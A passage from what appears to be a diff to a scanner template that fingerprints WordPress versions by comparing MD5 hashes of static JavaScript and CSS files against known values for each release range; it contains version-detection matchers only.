"(\"0e672b35b6bfab72babe50424503466b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"95137319acf4e217d0b193768155c9fa\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"01cdaa40c5e6b03518b159adae2b0673\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9a40299c0045e97780fd87af6c04ea77\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"343d63dd14ec979667d9d3a6210be95f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ae35b8b7fd84acc65690a0d13162d3b4\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"07ed58a67ed2becdbbe3657fb4da3e8e\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"2551f4595882e172dc1e6b68e8c64806\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"648f59aac0ad841a4035dc163482de5f\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"187909d84505ce345a885d0312d35081\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"4a89411639f686bd178d00573aa9dec1\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"2c2a69b51793d0f2865b705d1eaaa53c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"21570aa6de2c615eff4eb63f2b7a6a65\" == md5(body))" + - type: dsl + name: 3.6.1 - 3.7.33 + dsl: + - "(\"a3d703f0f3b6c2171edea4410ec478b5\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"d3565905a56a8dc9268f4e2d225d8e0e\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"463fd700afb5ed294264bc16a1063375\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a19969fc41d6dbc9db112398530434ec\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8074d90ba5bf9623345922540800eab\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"29b89850aaa6f77a7b49c2e6beb9921c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a27f49833d720b5bc9b288a32b776831\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"d131fd47305e4d0b31657b7df4163ac7\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"dd5628adfb50edf54fe9f81e2eb9d210\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"aabd9ea9037c5fe2bb6b2007ffc196f5\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"efdcaea17aeae5a67ccd1a770d38bee0\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"14dc2e370b485d43d4c0d28ba8883b92\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"87ade361a474d9b789bd894a25b7f085\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"8caa3a7ba57a57088a1ac11cff852966\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"75d0cf576de67064ef6a66f911d3be48\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"e3bf9cd74aa73cd3383e6968a464ba28\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"4412e7acac7f4231b6c07e3a4691ebd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"72c2441d86edf9ef1ef8fea945281db6\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"64cfe6d2916c9b29264414a55f79e038\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"e21167e2200cac86643cae38c67ace04\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"10b6fef22a3928c4b9354e7b8c38153d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6773da476c35af85238724bb65230f7d\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"b0b1e190c6972559e63acd0e4648bb87\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"35c458d7e445b782015238656aa086ea\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5593b5d1caa7c5902164ddd5392bff25\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3bb1a6dc71edb4b953c6dec624b162c5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c93e26230e05d4fdd87288b47c60873f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"8111a8d605183b921cb237a1406afcd9\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f4ca844f37f29e43b4386ce18a0c5f43\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.33 + dsl: + - "(\"03ad629cdfa5ab6ae56233ebbcb73262\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"10e74c33a682b849626d06d7c826e8e6\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"45687c2857346504c9f1a30b53aac86f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"a3699ee99e297be60886c6eda6ac825b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0192b04cf4169292d94cbf62519ab6ff\" == md5(body))" + - type: dsl + name: 4.9 + dsl: + - "(\"cb53c25524a16659fc1f961d507ba8bb\" == md5(body))" + - type: dsl + name: 4.9.1 - 5.0.11 + dsl: + - "(\"88f98b449b8aa12942cafd783b5aa7b5\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"875f1fdfc58ad8f9a9646cea752c5579\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b8f4f7a4ef5b0b9b56265ce6876b20f4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0bede42efd65e972891b8a927da5dc38\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"2d1d9fe235c2224f117fe901d73e8b04\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"fae67d9a9f6b3bd48515d77bbf683691\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e65885685bacc54dd952747d38dda90b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.js" + matchers: + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"cb1aec084f3cd28d6f37990e80174863\" == md5(body))" + - type: dsl + name: 3.7.1 - 3.7.33 + dsl: + - "(\"02ed0a4f130b11ee395676d0e26171b8\" == md5(body))" + - type: dsl + name: 3.7 + dsl: + - "(\"4eb9923fe07a29b24bac1e21aaa7e6eb\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5f51f325fb3e0b8e1737690dc96e3c9d\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"8b4d90c058f4f224c9c8f304d67e2dd5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"186e45b7613323108c761faee2a1cae1\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"2be4c574071c7a785fbad50515738c77\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"40e9c12914d1afb3978286bb1140b352\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"663feb32930d3bb5cb2a438f144f9d43\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c4c59bfbf6ac1101ee884761914d76da\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"19af2018dbb26944de552ba2df25a95c\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"3e07acce83c1bd7620680fcab0791113\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"5b140ddf0f08034402ae78b31d8a1a28\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"7b6858348aad603f95e0fde09e596870\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"27c9ee4fe976a84c4b3aa008d0a1b7fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"730da0a3e31cb3fd7069af78e90c150f\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.1.8 + dsl: + - "(\"5e813d95a85d8ea28d0a49ee1d043803\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"3fecc79e35495fcc9f8d89be8954afb8\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"689196d0bcdd6e580c39598b12c05943\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"bb0732eaf965130ece1b24ae7235da85\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"ae304f46f8a7284bb4da356459d1d37b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"baf5f28f8fd531b7dc647b139e7bad19\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"f5d55bb847148c9c3bd11ad00242894f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"f179d2f7d136440ad6c66b3cc7a3fd7e\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"f861771d6113ddf00850eb59002f3452\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"37afbe482f103bf4838086dc55eb2abc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"d12050e44bb9f6359fa229f7f9d51d61\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.1.8 + dsl: + - "(\"25209d7f4c896e298c193b79ec105d5d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"6807a1a2e5f6166d6387cb8e2e1a3201\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"73de2615baf27a16dd6e1894df887af8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"312bb2063162d37cc378b77f4894d54c\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"4b332eb4c9bbb5e89846330610c93727\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"431943477c661180307f94c241d650c6\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"43a4d5462bfb7fb1f6cba63b25fdcb1b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"fd68444066ed563f5ea531059d251e47\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"74b1f2dbd97fbc039cf46c3d98921eed\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e18da2c075eefe3711b16e2ca57e3fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dashboard.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"bee78ff276813ea4085614e738879030\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"0dc133e28d19ed6ae18702a58a335180\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"b900262c0a2aca5776dcfc19e2bec4b9\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"92f93e7b1f8859c86d8577635adcd863\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.2 + dsl: + - "(\"39f67345a12faf1a3c53c9289fc59f86\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c77078371b618b99aa2bdeb82eb81473\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3c89fd0ed1e0d37bde6d6722b815d02b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"b7f0a17a87fc20fe83d0a7b3d97b97b0\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"d14c932322f06c464282544b020ab812\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5fccc4199d79f8f028ff215d5f65d1ed\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"cdc52185bc346b9a55af6d5015d763cb\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"4641de29ebacfc526e739b33afbd0800\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3980aff112fb8222c364fbe4f7b88f58\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d1d46d0ff1a26493c5cebd586579ab02\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8b132ecee16938da9dd85c583d4681d9\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.1 + dsl: + - "(\"107d1144ac8c4b18346708704079b021\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"410cc788033c756935db30c728b1f63f\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"e040d11f39d268dff69edecf091f6e87\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"edea8c5146c4d778fc3a9e6f4377de4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"bfbe016b6f0d5f009a81b38f53e4bd4d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"1fdf9fead757cda46f53f3b79b55fe47\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"9b64d09bbbe5b190fcd535d858fb353f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6c3ea4737ae1a0f88a18b95fcd798581\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b0300165ad6c1ea5b03a6dd265636213\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"334de15df8332ef1cbebbcdc105c9a90\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"97d6a50c5da4c75f433f9ed02b5de62e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2b0b4e8d23d211fac38428825e524d6a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a4f5972d11d6f587d7d01372932e97ed\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e3a87490287abc38b9801a5ab853dda9\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"10d828db9d6ba8cbd2c2567664dccd7f\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"8917960dfdd03a01d3c003f403eea83f\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9dc196c29bce46911bb3f42c86e90586\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"51348baf610df3378679eab862ad5e55\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7c80f6ab4c6fd0d3f4c5391a2e635780\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7d53a09553401449f43c81877b556cad\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"a1200190c327704e2e289f9832fab738\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"9671059ae329ffb11662d51f5d1870a2\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"64206aaba162a411b337d64de20ecfea\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4650c4873e09cc55426cbe18ada6723e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6d6b42368f42527ceae8621ec731bd28\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"57c6a9490f4fcbed5358c061c1549043\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"181a0de4f1c4252aebb47f2204f0c119\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"3a4f06342b20831610cd2389936d60cb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a7ab21eae335ce585704016628603831\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2335c2d22bc85f12e4ca34d5993e026a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"4eeb8803dcb88361aeceeeb6339a3a51\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"acb2a06d6bb17892486bb83171ab57e0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8a3c425cdc87706f0e2f30643e278348\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"197404b329a50b23b37b0fbd72b81017\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d6b102488933f7cd50d8b1b17627733e\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"d87d776863fd4e2833fd40388559908b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"ea21d81ce5d4c547a1c13476f1274ffb\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"b13c1e5aa68a4038c1bc0582fc04d295\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c6eafec474a03263c37fa159dd794525\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4fa7b6674dee1a9dd01fa7474baf3096\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ed0357294791d25a02ddf53eca1c55da\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3b3696d5be809c1ae294cd0c1149431d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8a579bbb02688c923f0704ae98fcc87d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"34c98fdd54bd1ebe81fadf94002cf606\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"b34e40cefb53403bd9a8c058b7f91dd4\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"990729b33128aba139f4ca6f9c3d26db\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b54ad0d536080b196cb3e2e1d10691b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a9b79d9be177c2ac33595ba769fcd246\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce.js" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1a71eb9c2e788d1520b086939b14fdeb\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"9d2c582fe6cb12203ad0b857a029bd33\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ea8b083a18626a1affa3df8886b5a842\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"0e5309ea99cd90706a48953493e0ddef\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"459c552c4fed71b308d2fca0ed9ea37c\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"ffe71832a7c66be8b8df4640908d5166\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3cd3d82b486d5783b70ed642835b69ab\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"60a49686075ee09ee6fd6672dea7e013\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/twemoji.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.2 + dsl: + - "(\"c0390599690d05b4c11e1a8b9b0fab25\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"4405b6c3e027ec84fecf1544e6a95faf\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"be2f6b80d0307857a83d0b17b9f24d2d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"eb1a64327a54c38aedd775a04e8e0d10\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"67bccdc7434c745aa8fcd5d9f05acdf3\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"0bc85a034468a7c4571dba2653f74fbf\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"3ee6d376cd81409dd12d29b5dfcbf385\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c5e2468d0609ca34092c9d68466332ba\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fc199f3337f05b3a2e6920c4b47c74d1\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"241425f7ffff6596f2d19ced513b1f0b\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"4d33a4ad65ec90364e2c52aca8badf11\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8a6fb9053400858374294ffde81bf81d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bdeb78768f3f5a5613495826ad543a69\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"c9e9b421239fdb7f771bfc8e8c74dd2b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b9924734a6ca248128a9a04287228257\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"deaea3bc219e50b8db06022b21a078fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"5e1349161a85839be024488a50de95b3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b1e6ea1aee87917ff8cac7929130e61d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c9fa68152543f700153462035f04ba13\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"db41a7ad18e56aa32ac88650cf65f03f\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cdff2ab873be887ba6f04022ec98fdcb\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"833e64b0003fc66897e82fcfc7fc0121\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"5d1b42b737158c277828afda18881573\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"3c9615f3acb53ceee8340401a7939b89\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"e866498f734c0dcf94ea834e3fe81a83\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"734bf76b45a2a690043446ededf94b7d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"2b4eb0f12b5b5fb87f06528eb082b8a3\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"54c7805c00f9d4ee074fb60669e93fa7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4c455ba981ec9b471c7d9b0f459470ba\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"5ac558ef6bfa6308c3da00ed4c8bd467\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"8f492790e0bd47664cfc1267d3e4317f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b823320f18dc78ca56d7b3409a90f518\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"08154f808fde723690366d2b66237597\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/thickbox.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"805aa150a391e44e3245f25ea83bdfcb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6d9819a66083a19b6df22de32f072586\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b904be85634530e3008e9dc4722628fb\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"255290108a1c6a8ad31f6fa1415978a7\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"87bddde1890612b32a9a4672e5d26661\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"23b4106d316474bc2a38b48a01786aac\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"b1dcb13562cf13a93d4ddf10a7c6d787\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"1b31826535373c66aeeac3fc82008024\" == md5(body))" + - type: dsl + name: 2.7.1 - 3.2.1 + dsl: + - "(\"9e2094eaecb034d8e9d3d726518aab05\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"9c2bd2be0893adbe02a0f864526734c2\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"ed2c3a3ad714f3134bc7824fadd0eeea\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c2a19490b513519a3453915c73fa034b\" == md5(body))" + - type: dsl + name: 4.9 - 5.4.4 + dsl: + - "(\"69d6aa1f5bafc0d02da2d4470496ea12\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5dcdcf282792663175cd2c2e8ef04f6f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"37faeb50ef52da086e0f8c2c289e66d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9b59a1a32ef52f56906579bb83f2de2e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"0567f480faf8b31d9121fa36fc2ce535\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"50392a954a951e46177355be44c21914\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"080248c963bb67242f323af5cab56734\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"13c05456026f6c1866db7a742e27ab13\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5c7cc163f7382233369702a73f4ee078\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"95401f95b6dd126827e64f690a9db231\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"a45b939bffb49aeb3bf6ec41d32625e4\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"6e343b576a49ade0f56fa49dc42980af\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"fec0c0c5b8e76ffaeb87d95daa4d7e74\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.16 + dsl: + - "(\"c3d67006bc1b55274afa78df3b46f605\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"ff497c14667947cbbe75153b587405a9\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e7fb504704cbc728b307fcef68bc40e0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"75a99dd31bb764de27ea997e70ba8bc5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"62d2c2937b42ff6236a02a39047ac0fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"642b2c1283a26c19b78b4e204064f83c\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - 